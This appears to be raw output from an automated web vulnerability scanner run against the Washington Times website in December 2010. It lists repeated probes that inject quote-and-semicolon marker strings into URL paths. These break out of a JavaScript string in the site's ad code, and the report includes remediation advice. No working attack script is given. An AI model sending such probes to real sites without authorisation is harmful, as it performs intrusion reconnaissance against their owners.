GET /sports2ef81'%3b1c6ec8140f7/soccer/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14578
Date: Mon, 13 Dec 2010 21:33:26 GMT
X-Varnish: 570583636
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd23a"%3bfd38018970c was submitted in the REST URL parameter 1. This input was echoed as dd23a";fd38018970c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsdd23a"%3bfd38018970c/soccer/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14769
Date: Mon, 13 Dec 2010 21:32:58 GMT
X-Varnish: 570582953
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsdd23a";fd38018970c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbd81'%3b3fb869dcf85 was submitted in the REST URL parameter 1. This input was echoed as bbd81';3fb869dcf85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsbbd81'%3b3fb869dcf85/tennis/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14746
Date: Mon, 13 Dec 2010 21:32:17 GMT
X-Varnish: 570582410
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cad68"%3bbba3edf267f was submitted in the REST URL parameter 1. This input was echoed as cad68";bba3edf267f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportscad68"%3bbba3edf267f/tennis/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14564
Date: Mon, 13 Dec 2010 21:31:56 GMT
X-Varnish: 570581742
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportscad68";bba3edf267f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e1c"%3bd7295a814a2 was submitted in the REST URL parameter 1. This input was echoed as 50e1c";d7295a814a2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff50e1c"%3bd7295a814a2/jim-mcelhatton/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14549
Date: Mon, 13 Dec 2010 21:27:58 GMT
X-Varnish: 570576734
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff50e1c";d7295a814a2"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0c9f'%3bb51e55db5e7 was submitted in the REST URL parameter 1. This input was echoed as d0c9f';b51e55db5e7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffd0c9f'%3bb51e55db5e7/jim-mcelhatton/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:28:08 GMT
X-Varnish: 570577194
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf77"%3bc3886e3dbc1 was submitted in the REST URL parameter 1. This input was echoed as 7bf77";c3886e3dbc1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff7bf77"%3bc3886e3dbc1/kara-rowland/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:27:40 GMT
X-Varnish: 570576274
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff7bf77";c3886e3dbc1"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22b50'%3beb21f0e7a5c was submitted in the REST URL parameter 1. This input was echoed as 22b50';eb21f0e7a5c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff22b50'%3beb21f0e7a5c/kara-rowland/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14710
Date: Mon, 13 Dec 2010 21:27:55 GMT
X-Varnish: 570576847
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3666'%3b739cfcb501f was submitted in the REST URL parameter 1. This input was echoed as d3666';739cfcb501f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffd3666'%3b739cfcb501f/mark-a-kellner/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14717
Date: Mon, 13 Dec 2010 21:27:00 GMT
X-Varnish: 570575603
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b738c"%3b8a76cf07e99 was submitted in the REST URL parameter 1. This input was echoed as b738c";8a76cf07e99 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffb738c"%3b8a76cf07e99/mark-a-kellner/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:26:45 GMT
X-Varnish: 570575502
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staffb738c";8a76cf07e99"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90972"%3baed14a47f94 was submitted in the REST URL parameter 1. This input was echoed as 90972";aed14a47f94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff90972"%3baed14a47f94/patrice-hill/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14710
Date: Mon, 13 Dec 2010 21:27:13 GMT
X-Varnish: 570576023
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff90972";aed14a47f94"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f58e8'%3bfc2041e12c3 was submitted in the REST URL parameter 1. This input was echoed as f58e8';fc2041e12c3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stafff58e8'%3bfc2041e12c3/patrice-hill/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:27:41 GMT
X-Varnish: 570576607
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a438'%3bb2dec041db8 was submitted in the REST URL parameter 1. This input was echoed as 2a438';b2dec041db8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff2a438'%3bb2dec041db8/rowan-scarborough/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14710
Date: Mon, 13 Dec 2010 21:28:19 GMT
X-Varnish: 570577209
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d41c"%3baacf75e4014 was submitted in the REST URL parameter 1. This input was echoed as 8d41c";aacf75e4014 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff8d41c"%3baacf75e4014/rowan-scarborough/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14717
Date: Mon, 13 Dec 2010 21:27:59 GMT
X-Varnish: 570576939
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff8d41c";aacf75e4014"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe01"%3b69828b0631e was submitted in the REST URL parameter 1. This input was echoed as afe01";69828b0631e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffafe01"%3b69828b0631e/sean-lengell/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14710
Date: Mon, 13 Dec 2010 21:28:12 GMT
X-Varnish: 570577003
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staffafe01";69828b0631e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edbc8'%3b8bdfe50a6d7 was submitted in the REST URL parameter 1. This input was echoed as edbc8';8bdfe50a6d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffedbc8'%3b8bdfe50a6d7/sean-lengell/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14710
Date: Mon, 13 Dec 2010 21:28:46 GMT
X-Varnish: 570577764
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44fff'%3bb52896099db was submitted in the REST URL parameter 1. This input was echoed as 44fff';b52896099db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff44fff'%3bb52896099db/stephen-dinan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:29:03 GMT
X-Varnish: 570578250
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54c47"%3b3593b73d581 was submitted in the REST URL parameter 1. This input was echoed as 54c47";3593b73d581 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff54c47"%3b3593b73d581/stephen-dinan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14576
Date: Mon, 13 Dec 2010 21:28:54 GMT
X-Varnish: 570578068
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff54c47";3593b73d581"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a11c7'%3b24813ea3b64 was submitted in the REST URL parameter 1. This input was echoed as a11c7';24813ea3b64 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoa11c7'%3b24813ea3b64/capitol-hill-minute/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:37:14 GMT
X-Varnish: 570589396
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b58"%3bc2756825d4e was submitted in the REST URL parameter 1. This input was echoed as 29b58";c2756825d4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video29b58"%3bc2756825d4e/capitol-hill-minute/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14549
Date: Mon, 13 Dec 2010 21:36:54 GMT
X-Varnish: 570589096
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="video29b58";c2756825d4e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc41d'%3bb46c09a1569 was submitted in the REST URL parameter 1. This input was echoed as fc41d';b46c09a1569 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videofc41d'%3bb46c09a1569/inside-the-beltway/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14717
Date: Mon, 13 Dec 2010 21:37:12 GMT
X-Varnish: 570589581
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d75af"%3bee5822a4ff4 was submitted in the REST URL parameter 1. This input was echoed as d75af";ee5822a4ff4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videod75af"%3bee5822a4ff4/inside-the-beltway/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:37:02 GMT
X-Varnish: 570589299
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="videod75af";ee5822a4ff4"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 425a0"%3bc9e2b3827f6 was submitted in the REST URL parameter 1. This input was echoed as 425a0";c9e2b3827f6 in the application's response.
